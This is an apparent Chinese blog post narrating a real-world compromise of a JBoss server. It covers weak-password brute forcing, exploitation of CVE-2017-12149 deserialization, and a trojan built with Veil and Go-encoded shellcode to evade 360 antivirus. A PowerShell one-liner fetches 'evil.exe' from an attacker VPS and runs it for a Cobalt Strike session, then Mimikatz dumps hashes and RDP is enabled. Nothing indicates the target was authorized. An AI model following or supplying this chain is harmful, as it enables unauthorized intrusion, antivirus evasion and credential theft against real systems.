jboss反序列化实战

  对于jboss的登录界面,首先就是控制台的弱口令爆破。这几天遇到一个反序列化漏洞拿shell的情况,就理一理头绪。

  弱口令爆破失败以后,拿出CVE-2017-12149的反序列化检测是否存在漏洞,显示存在,且系统是windows系统,首先对信息进行一下简单的收集。ping一下能否出网(不出网没法下载木马),接着是尝试利用cmd远程下载搭在vps的免杀木马,免杀木马使用veil进行编译,再通过go语言对shellcode进行base64编码绕过360。

  远程下载的方法参考了这个 https://www.cnblogs.com/xiaozi/p/12721960.html,先用了certutil方法,无法成功,在自己的本机上尝试一下,原来是uac给阻碍了。接下来尝试用powshell,cmd输入powershell (new-object System.Net.WebClient).DownloadFile('http:/ip+文件位置)','evil.exe')),成功上传,直接evil.exe运行木马,cs上线,然后对内网进行一波信息收集,发现内网存在不少存活主机,使用cs自带的mimikatz抓取hash,很幸运的抓取到了,接着是开启3389,进行远程连接。

  就此告一段落,内网横向以后有空再搞

posted @ 2020-11-27 15:49  Cold灬  阅读(271)  评论(0)    收藏  举报